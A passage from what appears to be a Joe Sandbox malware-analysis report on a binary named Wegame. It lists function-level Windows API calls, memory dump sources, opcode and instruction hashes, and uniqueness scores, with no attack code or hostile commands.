                                                                • Opcode Fuzzy Hash: 33d7f6560ed9b567fcb6baa78f68b4d2aefe8860636929c4640156a7a3f57bc8
                                                                • Instruction Fuzzy Hash: 9EF03C7091122ADFDB01CFA889404ADBBB1BF19710B60C4BEE9049B261C7788A10EB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 004568B8
                                                                  • Part of subcall function 004532C0: __EH_prolog3.LIBCMT ref: 004532C7
                                                                  • Part of subcall function 00456817: __EH_prolog3.LIBCMT ref: 0045681E
                                                                  • Part of subcall function 00456817: _CxxThrowException.VCRUNTIME140(?,0049C288,?,00000054,?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s), ref: 00456849
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 95a2e7b75dd3f24375c1c6c96b6e09c2f0823df2eda1ea427766558365546fde
                                                                • Instruction ID: 01f51ccb7d3c390e38c57f3e7afcfce6fdef03b332b7480e6f8aea583c7bc8c1
                                                                • Opcode Fuzzy Hash: 95a2e7b75dd3f24375c1c6c96b6e09c2f0823df2eda1ea427766558365546fde
                                                                • Instruction Fuzzy Hash: CDF03070D0020A7BDF10BFF2CC86DAE36699F04359F40840EB91073153ED3D9A188AA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD442DE
                                                                  • Part of subcall function 6BD42B73: __EH_prolog3.LIBCMT ref: 6BD42B7A
                                                                  • Part of subcall function 6BD44233: __EH_prolog3.LIBCMT ref: 6BD4423A
                                                                  • Part of subcall function 6BD44233: _CxxThrowException.VCRUNTIME140(?,6C044AE4,?,00000054,?,6C044B6C,?,000000B4,6BD442D6,00000000), ref: 6BD44265
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 22693f47ba814957a47a655d8f65a396a4a9129cdbe19691e2fe80b52bb23df8
                                                                • Instruction ID: 7e2e0993b05658499e222b1d24a5c58850f717460f26869589bced6758a366eb
                                                                • Opcode Fuzzy Hash: 22693f47ba814957a47a655d8f65a396a4a9129cdbe19691e2fe80b52bb23df8
                                                                • Instruction Fuzzy Hash: 0CF054B1C1820A77CF159FB0DC46E9F766DAF18268F104425B8006B151DF3D8F518B70
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3668304517-0
                                                                • Opcode ID: 9db1139341ee71beaf4eadc5676e0ca240d293114d984be1f9c792ddeb399716
                                                                • Instruction ID: 6a4379d2ee23207220dab1f69b7300e7a86626f77b9201b20968502be1a5df7f
                                                                • Opcode Fuzzy Hash: 9db1139341ee71beaf4eadc5676e0ca240d293114d984be1f9c792ddeb399716
                                                                • Instruction Fuzzy Hash: 0AE09B715245014FE33C8F68E89475EB6A69F41325F240F5CE081CBED1DB7C99854755
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?shutdown@Application@common@ierd_tgp@@EAEXXZ.COMMON(6C062590,00000010,6BD09278,00000004,00000004,00000003,6BD08EC0,6BD08ED0,-00000002,000000D5), ref: 6BE241B5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?shutdown@Application@common@ierd_tgp@@
                                                                • String ID:
                                                                • API String ID: 3896587232-0
                                                                • Opcode ID: 99b116bc64c491225551b0053b57dbccf84d436cdc8efed930eedb47d0f5764d
                                                                • Instruction ID: 2eb6fe376593ea7bad5aaedbb47dda415d37a63a945640ab75ba4f46172aa89c
                                                                • Opcode Fuzzy Hash: 99b116bc64c491225551b0053b57dbccf84d436cdc8efed930eedb47d0f5764d
                                                                • Instruction Fuzzy Hash: 6EF09A76A00349CFCB00CFA8C9826DDBBB1FF54319F20452FD92667281CB349A11CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD398B3
                                                                  • Part of subcall function 6BD362B7: __EH_prolog3.LIBCMT ref: 6BD362BE
                                                                  • Part of subcall function 6BD3C3AB: __EH_prolog3.LIBCMT ref: 6BD3C3B2
                                                                  • Part of subcall function 6BD3B752: __EH_prolog3.LIBCMT ref: 6BD3B759
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$H_prolog3_
                                                                • String ID:
                                                                • API String ID: 4240126716-0
                                                                • Opcode ID: c79d234b7baacce58b4d7c0154c86375c2f8eef7bc8d35077d29384e9c28bf6f
                                                                • Instruction ID: 918c33bc8ac0a91889b70ca069a828416f09c2cd6f27574cbe5ed72dcbfa6737
                                                                • Opcode Fuzzy Hash: c79d234b7baacce58b4d7c0154c86375c2f8eef7bc8d35077d29384e9c28bf6f
                                                                • Instruction Fuzzy Hash: A3F037B181062C8BCF11EF60CC81BDDB735BF11318F1088E99A192B151DBB85BC88FA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2745E
                                                                  • Part of subcall function 6BD260AA: __EH_prolog3_GS.LIBCMT ref: 6BD260B1
                                                                  • Part of subcall function 6BD260AA: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6BD27474,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD260C6
                                                                  • Part of subcall function 6BD273A9: __EH_prolog3_GS.LIBCMT ref: 6BD273B0
                                                                  • Part of subcall function 6BD273A9: CryptGenRandom.ADVAPI32(?,?,?,00000034,6BD27489,?,00000010,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD273BE
                                                                  • Part of subcall function 6BD26642: CryptReleaseContext.ADVAPI32(00000000,00000000,1F5A0D44,00000000,00000000,6BF78BD3,000000FF,?,6BD274A8,?,00000010,0000001C,6BD259BA,?,?,?), ref: 6BD26675
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CryptH_prolog3_$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 3909388945-0
                                                                • Opcode ID: 88467664f26c7733667c03df3a97ba304c8011a073721bc086ec329b6ecfd774
                                                                • Instruction ID: 4ecf5c442f9323bbfd13525e59c8c2bb99de7fb39def3acd3d5b9a78e356cc25
                                                                • Opcode Fuzzy Hash: 88467664f26c7733667c03df3a97ba304c8011a073721bc086ec329b6ecfd774
                                                                • Instruction Fuzzy Hash: 67F03A329002489BCF15DFB0C946ADD73B9AF08368F6041A9E611BF190DB7A9F059B64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6BD5F657
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: TimerWaitable
                                                                • String ID:
                                                                • API String ID: 1823812067-0
                                                                • Opcode ID: 81aaa0f96d061ab926adb97f7d3e87c2c457a34f1effd6a0990a0a39e6c4b45d
                                                                • Instruction ID: 6728e61924479bad628ffb7830d9f94cfe24c591de769ac33cfa122921e0b10f
                                                                • Opcode Fuzzy Hash: 81aaa0f96d061ab926adb97f7d3e87c2c457a34f1effd6a0990a0a39e6c4b45d
                                                                • Instruction Fuzzy Hash: 74E0C97180102DBF9F50EFA5C849CDF7FBCEF056A4B004556B5099B150C6309655CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 8bca5b145f1c05452d2650aa230719ecd054703a26aed474cdc1b5ea716789db
                                                                • Instruction ID: 6f10171660fc0bb216756e4cc618920254255a5e7a20f312f174432d77842227
                                                                • Opcode Fuzzy Hash: 8bca5b145f1c05452d2650aa230719ecd054703a26aed474cdc1b5ea716789db
                                                                • Instruction Fuzzy Hash: CEF012B5C10209CBEF01DFA8C8027EEBBB1BF15329F140428E8006A241D7BA9A549BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 44f6daf8e5080861ce83b8d5fb6f192bd74ffded88f204376191761f79b10ff0
                                                                • Instruction ID: 42ac9ae89068dc4879206b44f24e272fc99addd5cdea2396863d527d66efebe7
                                                                • Opcode Fuzzy Hash: 44f6daf8e5080861ce83b8d5fb6f192bd74ffded88f204376191761f79b10ff0
                                                                • Instruction Fuzzy Hash: B0F03A78600249EFCB11DF69C94498E7BF1FF08319F10855EF5548B251C775DA11CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 461d0e59e4d931a84ffc1196125caf984f1b72b3810b75fad93ba94051a13a69
                                                                • Instruction ID: c76a81518d83f2dbe362917a6ed8c16710143e9d170a7b37eb1f6c7a46b25b0b
                                                                • Opcode Fuzzy Hash: 461d0e59e4d931a84ffc1196125caf984f1b72b3810b75fad93ba94051a13a69
                                                                • Instruction Fuzzy Hash: 8FF06775610204DFCB11CF68C544A8A7BB1BF09314F10856DE5508B2A0C376DA11DFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 6BD2E0AF: __EH_prolog3_GS.LIBCMT ref: 6BD2E0B6
                                                                  • Part of subcall function 6BD2E0AF: CreateEventA.KERNEL32(00000000,7622DF20,00000000,00000000,00000030,6BD2E4FC,00000000,00000000,?,6BD31BDC,?,?,00000000,7622DF20,?), ref: 6BD2E0C7
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,6BD31BDC,?,?,00000000,7622DF20,?,?,6BE25CF7,1F5A0D44,00000000,7622DF20,?,?,6BF9AEF0), ref: 6BD2E50F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ChangeCloseCreateEventFindH_prolog3_Notification
                                                                • String ID:
                                                                • API String ID: 91177929-0
                                                                • Opcode ID: 82a587df5b5922926858ee6076565cfbd8e81984a2d4595fb62fb013c62c3fa4
                                                                • Instruction ID: 425ba6fb6831cf36f6b15865aaed7f0793a439bcc9aebabfe5c7e053dae367cb
                                                                • Opcode Fuzzy Hash: 82a587df5b5922926858ee6076565cfbd8e81984a2d4595fb62fb013c62c3fa4
                                                                • Instruction Fuzzy Hash: 96E08C3AB281208B9B189B3D7C0045623D99BC472832584ACFE44DB308EA34CD4246D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • socket.WS2_32(00000017,00000002,00000000), ref: 6BE35D10
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD31657
                                                                  • Part of subcall function 6BD254B1: __EH_prolog3.LIBCMT ref: 6BD254B8
                                                                  • Part of subcall function 6BD31E4A: __EH_prolog3_GS.LIBCMT ref: 6BD31E51
                                                                  • Part of subcall function 6BD31E4A: GetTickCount.KERNEL32 ref: 6BD31E98
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 1641273540-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD99E64
                                                                  • Part of subcall function 6BD9A0A9: __EH_prolog3.LIBCMT ref: 6BD9A0B0
                                                                  • Part of subcall function 6BD2F6D8: __EH_prolog3_GS.LIBCMT ref: 6BD2F6DF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$H_prolog3_
                                                                • String ID:
                                                                • API String ID: 4240126716-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BD3B8D3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: fflush
                                                                • String ID:
                                                                • API String ID: 497872470-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD38E4C
                                                                  • Part of subcall function 6BD345D7: __EH_prolog3.LIBCMT ref: 6BD345DE
                                                                  • Part of subcall function 6BD3A667: __EH_prolog3_GS.LIBCMT ref: 6BD3A66E
                                                                  • Part of subcall function 6BD3A667: ?rdstate@ios_base@std@@QBEHXZ.MSVCP140(?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004,6BD36B89,00000000,?,00000000), ref: 6BD3A69C
                                                                  • Part of subcall function 6BD3A667: OutputDebugStringW.KERNEL32(00000000,?,?,?,00000000), ref: 6BD3A6CC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?rdstate@ios_base@std@@DebugH_prolog3_OutputString
                                                                • String ID:
                                                                • API String ID: 2460924097-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD91836
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                  • Part of subcall function 6BD916BC: __EH_prolog3.LIBCMT ref: 6BD916C3
                                                                  • Part of subcall function 6BD916BC: _Mtx_init_in_situ.MSVCP140(?,00000002,00000008,6BD9185D,00000004,6BD952B7,00000000,6BD56BC6,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD91791
                                                                  • Part of subcall function 6BD916BC: memset.VCRUNTIME140(?,00000000,00004EAC,?,00000002,00000008,6BD9185D,00000004,6BD952B7,00000000,6BD56BC6,?,00000000,0000008C,6BD577C5,00000002), ref: 6BD917A8
                                                                  • Part of subcall function 6BD916BC: GetCurrentThreadId.KERNEL32 ref: 6BD91817
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CurrentMtx_init_in_situThreadmallocmemset
                                                                • String ID:
                                                                • API String ID: 3113669236-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0043EF5B
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                  • Part of subcall function 0043DDA0: __EH_prolog3_GS.LIBCMT ref: 0043DDA7
                                                                  • Part of subcall function 0043DDA0: ??0CThread@@QAE@XZ.COMMON(00000024), ref: 0043DDB4
                                                                  • Part of subcall function 0043DDA0: ?appdata_project_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0043DDDE
                                                                  • Part of subcall function 0043DDA0: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0043DDFA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?appdata_project_folder@File_info@common@ierd_tgp@@H_prolog3H_prolog3_SimpleString::operator=Thread@@Vpath@filesystem@3@malloc
                                                                • String ID:
                                                                • API String ID: 658492096-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3C3B2
                                                                  • Part of subcall function 6BD19850: __EH_prolog3.LIBCMT ref: 6BD19857
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3160F
                                                                  • Part of subcall function 6BD254B1: __EH_prolog3.LIBCMT ref: 6BD254B8
                                                                  • Part of subcall function 6BD31D7B: __EH_prolog3_GS.LIBCMT ref: 6BD31D82
                                                                  • Part of subcall function 6BD31D7B: GetTickCount.KERNEL32 ref: 6BD31DB8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 1641273540-0
                                                                • Opcode ID: 79e0ecb6fb1e6427b424f092bd5324f04a365e56e2615c9f8cb837384092345c
                                                                • Instruction ID: 047978196ed66a43dce45ecdfd41ca8dc30e05724c4f58f4987cf2edab6b6d0b
                                                                • Opcode Fuzzy Hash: 79e0ecb6fb1e6427b424f092bd5324f04a365e56e2615c9f8cb837384092345c
                                                                • Instruction Fuzzy Hash: A8E06D30821248ABCF01EBB8C8067DC7B646F11328F90425CE5005E2D0CB7D8B55A7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • WSAStartup.WS2_32(?,1F5A0D44), ref: 6BF70103
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: 30ac7b22560502581b56261bdcde7254aaf3fd327ac7ca5fff720b6e280be522
                                                                • Instruction ID: 67a6cf5c40ff4225f34aed4318e856ee867df3788e7b6697bc539753e38ce203
                                                                • Opcode Fuzzy Hash: 30ac7b22560502581b56261bdcde7254aaf3fd327ac7ca5fff720b6e280be522
                                                                • Instruction Fuzzy Hash: 25E086705142804FCB35BB28C476BFA7BE4AB8E300F400819A1DDC7240E63C95058752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 6BD16B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C098414,6BD16BB1,6C098418,?,6BD1A235,00000000,?,00000010), ref: 6BD16B81
                                                                  • Part of subcall function 6BD16B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BD16B8D
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,00000000,?,?,?,?,6C03BD18,?,?,?,?,?,00000000,00000044,?,6C03BD18), ref: 6BD61BC5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?exists@filesystem@ierd_tgp@@Execute_once@std@@Uonce_flag@1@Verror_code@std@@@Vpath@12@terminate
                                                                • String ID:
                                                                • API String ID: 3201841121-0
                                                                • Opcode ID: 44bad85fd55e388663efb16c1270524ad2c5c494d0e774fee32e5b264cdd4f1a
                                                                • Instruction ID: ca7810481f279a3fc0b64f3eacf4750d974c821dfe695c5f98abae31212960ec
                                                                • Opcode Fuzzy Hash: 44bad85fd55e388663efb16c1270524ad2c5c494d0e774fee32e5b264cdd4f1a
                                                                • Instruction Fuzzy Hash: 67D012B241820CBFEB059BE1D903EDE7FFCDB003A9F10415AE4059A090FB79AB4486B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,00000000,?,6BD475CC,?,00000000,?,files,00000005), ref: 6BD46FD9
                                                                  • Part of subcall function 6BD46FE3: __EH_prolog3.LIBCMT ref: 6BD46FEA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?get_cfg@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3U?$less@V12@V?$basic_ptree@Vpath@filesystem@2@
                                                                • String ID:
                                                                • API String ID: 1018117080-0
                                                                • Opcode ID: 4f23327678cb210834d688bdc7d14eaf2cd09f839c3f7af599adfa6ff0f24a10
                                                                • Instruction ID: 86d5dc060af8511b225af91d828deaed6b8f731003e018e8950c9645eaa0920a
